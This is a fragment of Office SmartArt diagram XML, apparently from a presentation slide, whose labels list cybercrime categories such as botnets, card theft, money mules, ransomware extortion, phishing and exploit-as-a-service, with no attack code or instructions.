    <dgm:cxn modelId="{B3AE1531-8E15-4BE9-94B9-1CC06699C937}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{ED8460A9-D5F2-4DB8-9253-A88A15090506}" type="presParOf" srcId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" destId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B84FD058-13FC-4E36-B1CC-EB1B422DFEAB}" type="presParOf" srcId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" destId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{FE6380F8-BBC0-4FF0-84C6-3AE5DFB9A885}" type="presParOf" srcId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" destId="{A5B2796D-E837-4404-9852-61F32C250BFA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB897544-2E25-42DF-BE50-F555D972762D}" type="presParOf" srcId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" destId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB5FB326-C7F3-4C7A-91B4-72706DE60842}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{73DC0BED-9251-4B5C-8191-EE587DFF262E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6F6255F1-F40C-4185-BC76-BB573C6D6D68}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{29C1F1F2-865C-4369-B5AA-00425125198E}" type="presParOf" srcId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" destId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{94284893-A642-4B31-9860-93FA57778DCA}" type="presParOf" srcId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" destId="{47F209D6-A50F-4593-8101-495466DA161C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B32B2F53-F315-416E-8665-4FB3FF1858B0}" type="presParOf" srcId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" destId="{98617AD6-2A5A-4CC4-817B-C33D1FB1B247}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E4E50648-66B0-4B93-9C04-4D70D4C390D4}" type="presParOf" srcId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" destId="{44FEA90B-B9F0-4838-A33A-C2D7921EB239}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C6E79500-C5CB-4E73-BA17-B6D9BCE88DE2}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{493BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DD6FF320-BA5D-4D63-BE54-468A9BE1ABC8}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{30E2F406-52B6-4843-8762-19EE82C6795D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7D5B285A-DD70-4CB2-83CA-363AC56158E5}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{846994CE-CB32-4B54-9243-F462A1BAB8D6}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{11BDAE4A-BDED-4A8E-B175-FF65C957881B}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{89825871-887C-4144-92E4-0CD1C779523E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{BE544174-B4AF-4ACC-B8C4-4A81C82B51D3}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{A382E3D8-F167-402C-95ED-E85E712B3958}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB97D865-4F7E-43FB-A2BD-0B3C980F8B8D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{AC97DC07-675E-4CF3-9913-C7CB3E6FE0DB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A1E0EB1C-BCB0-40B7-85BC-0ACFABA3374D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9F17A1D6-89D0-479D-9E04-BB7ABFD5CE57}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67966BE4-FE5C-4570-9440-292AFFDB4ECC}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5B4386DD-F917-43FB-BD7A-792114CE85BD}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{769CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D68CB307-387B-4B02-BB59-4F8D93E9BECE}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{F80F370F-4960-4A7F-8CDD-3F645777D926}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C7262EEE-09B2-4C39-B93D-0C6697BFCA6B}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1164DF9C-47B4-4930-BF8C-FB83C56F57E8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9ABDAE99-4AA9-4F09-8D3E-8A19AF57C419}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A778D506-92B5-4FC9-8988-820EDFBF4190}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67965192-6709-4753-B296-83A5E275D540}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{49871D27-F564-45D4-9535-E5D3429C61C3}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{1DE75C67-9F60-4DCF-8A09-6EBB5AA047F8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{72988983-F36C-49B8-9178-884F57BA9842}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{3E089C12-00A1-4C52-ACA6-DA689DC530B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D3D7B3E0-2DE8-4C73-8092-27B984FFF627}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{DCB922D2-A971-46B6-8A66-A63871EC5D71}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{913BBCA6-6A15-4081-ACFB-D98F477B7550}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1BE63070-B619-415B-AE72-C4895210C2ED}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{88885C49-E13F-46DB-BD55-02549CE6B683}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{39DE0E1E-A457-4031-A6D1-C04DDA15C6D9}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{26F2BD33-885F-4A44-82C7-4A65EBFA30E6}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{D7493045-F4D0-49BB-8749-0235A8D3915E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F54E657B-FEC8-4658-B618-9477ABD53598}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{E562E629-8E7C-4C02-A214-F4E36EE87E99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AE993755-C27B-4D66-B7FA-337056FF690B}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{B2CAA67D-ED33-4120-9634-DF98516FB005}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4BC450DA-C7E2-4383-A9BD-D326CF26687E}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B0B4EB34-DD2F-4309-B751-E58D5D591CAF}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9532000B-227B-4799-A1D1-6E51BB4EC17B}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{A20E9766-61CD-4711-B99D-41622BFCA782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D0537B6E-16F4-4A9A-A7DF-AE2F524FE785}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{E1CF22F3-AC19-46C9-A82F-89D8DB189CE8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E619EEAD-D932-4228-A171-FDFC2A3FA229}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{4A7C2F52-ACA9-4730-89EA-B234D19B30FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AC723CA2-7799-4818-B6E1-D9570D14FB31}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{CE2BD6A2-C6A6-4AE7-8716-F62AC787B4F6}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{137C7443-E818-4254-BC58-ED1832584EF8}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{124F88C5-C1D5-4402-8050-69A3610B0063}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0B5E36FB-CF72-4F52-8173-8D0CCEDA9AF4}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DC7E7830-0E48-4050-9CC0-FF34AA022703}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{2CA4696A-F32D-4557-9668-86E3DEF687D3}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{F83FE0F9-C0AD-41ED-8499-585D4FDF8177}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E8990450-3DB7-4904-A625-F1E80A3C4A27}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{E3521F4E-CD84-466B-AF37-02AB70C55B9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20B35F-2635-4F8F-9051-2B1A318D39FF}"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B632587F-1A59-4B58-8F39-3F88332608F5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Botnets</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E780597-A9D7-4E6A-B969-7F37A974753C}" type="parTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAFC8618-BD8D-4D8C-BB34-17C52689EDA4}" type="sibTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F06AC04-9C84-4A47-BFDD-AE87232D1106}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E7D7A7B-2ADD-469E-B0F8-D565F03F46F9}" type="parTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33C404C4-6211-4C8B-9140-D0533EAFE621}" type="sibTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F920927-1A73-470C-97F0-75ABFA67423F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B2D1F3B-F359-4548-91E0-0C2AC7CCD7A1}" type="parTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79406963-93E8-4610-9E27-FEFF794E3AB0}" type="sibTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426355DA-85B0-49DB-B723-939237685E7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05039FCC-4F08-4EEE-ACAE-BAC85EFDD1D7}" type="parTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7DCF50B-90BE-4C41-AAFB-5990C2737070}" type="sibTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03A48CFA-6496-41BF-A746-80A181C3C3DE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Spam</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72633D96-4A27-4E50-A39C-37AB41EEA9FE}" type="parTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E5E1350-FE66-4F91-840A-B3A1E5069B7E}" type="sibTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45F34A96-294F-4F91-858C-0CCFEC2CFF6B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3BBBB2C-8F74-4541-A78F-D9AB9652D44B}" type="parTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AD622BB-3D20-4961-90A9-7E3A3EAB1155}" type="sibTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C92294B8-F12A-42FD-B72C-42C2FDCD2D8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80A49C2A-5C20-42BB-A1DC-6558C20289C2}" type="parTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{611D77A5-92DE-47E3-878A-892C64739260}" type="sibTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CB81644-432E-42AF-ABA9-71ABDDE58956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95C1DC5D-E737-4A41-83F0-AD800A95D9F5}" type="parTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87368739-70E0-48CC-B078-DBA02B966C38}" type="sibTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{934DA221-5443-497E-A4E4-A348E6ACDDB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37AAF2A0-4D79-4496-8E06-D2AF95C6A459}" type="parTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4D10C71-FE60-4F42-8EF6-606461EE738A}" type="sibTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7262895B-02E6-4067-B862-A12DB86A98B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pharma</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B84157D2-97EE-4800-B4AC-94C8F5F6CAC1}" type="parTrans" cxnId="{48E9A6F3-62C7-4B34-8F68-E30BE366DA6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28D31E2B-7F29-4B0D-9CDC-20DFC358C7ED}" type="sibTrans" cxnId="{48E9A6F3-62C7-4B34-8F68-E30BE366DA6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A040FE0B-3A44-46B9-9424-B56BC4D65E95}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D121FA2-20E5-4E0E-88EC-D5A9C0452847}" type="parTrans" cxnId="{AB9BDB96-A156-473B-BFA6-EECEEE12996E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0ECBD85E-E0D0-495A-A4FD-CAF42D3ADB40}" type="sibTrans" cxnId="{AB9BDB96-A156-473B-BFA6-EECEEE12996E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A42A7329-4DA3-4869-8617-3824288EF391}" type="parTrans" cxnId="{14380A70-6C0D-4A7D-B752-D44E7EB01E39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
